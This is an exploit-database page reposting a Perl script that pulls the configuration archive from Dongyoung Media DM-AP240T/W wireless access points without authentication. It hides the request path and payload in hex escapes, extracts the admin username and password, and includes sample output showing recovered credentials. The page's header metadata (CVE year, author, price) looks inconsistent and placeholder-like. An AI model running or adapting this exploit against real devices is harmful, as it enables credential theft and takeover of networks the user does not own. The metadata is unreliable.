Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure
CVE
Category
Price
Severity
CVE-2017-12345
CWE-200
$5000
Critical
Author
Risk
Exploitation Type
Date
Security Researcher X
High
Remote
2019-10-03
CPE
cpe:cpe:/h:dongyoung-media:dm-ap240t-w
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019100012 Below is a copy:
Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure #!/usr/bin/perl -w
#
# Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
#
# PASSWORD DISCLOSURE, TEST:
#
## [test@localhost ~]$ perl dm-ap240t.pl http://192.168.1.102:8080
## [ Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure
## [ =================================================================================
## [ Exploit Author: Todor Donev 2019 <[email protected] >
## [ Initializing the browser
## [ >> Referer => http://192.168.1.102
## [ >> User-Agent => Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-gb) AppleWebKit/528.10+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
## [ >> Content-Type => application/x-www-form-urlencoded
## [ << Connection => close
## [ << Accept-Ranges => bytes
## [ << Content-Length => 33412
## [ << Content-Type => application/octet-stream
## [ << Client-Date => Thu, 03 Oct 2019 10:41:05 GMT
## [ << Client-Peer => 192.168.1.102:8080
## [ << Client-Response-Num => 1
## [ << Content-Disposition => attachment;filename="config.tgz"
## [ << Content-Transfer-Encoding => binary
## [ << Set-Cookie => QSESSIONID=ea4bfb8c9455d441efefc531841d7459; path=/
## [
## [ Admin User : ktroot
## [ Admin Pass : 1234567890
## [test@localhost ~]$
#
#
# CONFIGURATION DUMP, TEST:
#
## [test@localhost ~]$ perl dm-ap240t.pl http://192.168.1.102:8080 show | head
## [ Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure
## [ =================================================================================
## [ Exploit Author: Todor Donev 2019 <[email protected] >
## [ Initializing the browser
## [ >> Referer => http://192.168.1.102
## [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.0 (like Gecko)
## [ >> Content-Type => application/x-www-form-urlencoded
## [ << Connection => close
## [ << Accept-Ranges => bytes
## [ << Content-Length => 33415
## [ << Content-Type => application/octet-stream
## [ << Client-Date => Thu, 03 Oct 2019 10:15:16 GMT
## [ << Client-Peer => 192.168.1.102:8080
## [ << Client-Response-Num => 1
## [ << Content-Disposition => attachment;filename="config.tgz"
## [ << Content-Transfer-Encoding => binary
## [ << Set-Cookie => QSESSIONID=34f95926faa74a38c4bf527c2545e816; path=/
## [
## [ >> Configuration dump...
## [
## [ ./config/0000755000000000000000000000000013545344507011170 5ustar rootroot./config/hostapd_open_ath11.conf0000644000000000000000000000060400000000012015452 0ustar rootrootignore_file_errors=1
## [ logger_syslog=-1
## [ logger_syslog_level=2
## [ logger_stdout=-1
## [ logger_stdout_level=2
## [ debug=0
## [ ctrl_interface=/var/run/hostapd
## [ ctrl_interface_group=0
## [ ssid=ATH11
## [ ignore_broadcast_ssid=0
## [test@localhost ~]$
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster;
my $host = shift || ''; # Full path url to the store
my $cmd = shift || ''; # show - Show configuration dump
$host =~ s/\/$//;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print STDERR "[ Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure\n";
print STDERR "[ =================================================================================\n";
print STDERR "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/){
print STDERR "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
print STDERR "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
exit;
}
print STDERR "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
my $target = $host."\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x73\x79\x73\x5f\x73\x79\x73\x74\x65\x6d\x5f\x63\x6f\x6e\x66\x69\x67";
my $payload = "\x63\x6f\x6e\x66\x69\x67\x5f\x63\x6d\x64\x3d\x25\x43\x30\x25\x46\x41\x25\x43\x30\x25\x45\x35";
my $request = HTTP::Request->new (POST => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host], $payload);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print STDERR "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print STDERR "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print STDERR "[ \n";
if ($cmd =~ /show/) {
print STDERR "[ >> Configuration dump...\n[\n";
print "[ ", $_, "\n" for split(/\n/,$config);
exit;
} else {
print "[ Admin User : ", $1, "\n" if($config =~ /ROOT_ID=(.*)/);
print "[ Admin Pass : ", $1, "\n" if($config =~ /ROOT_PW=(.*)/);
exit;
}
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum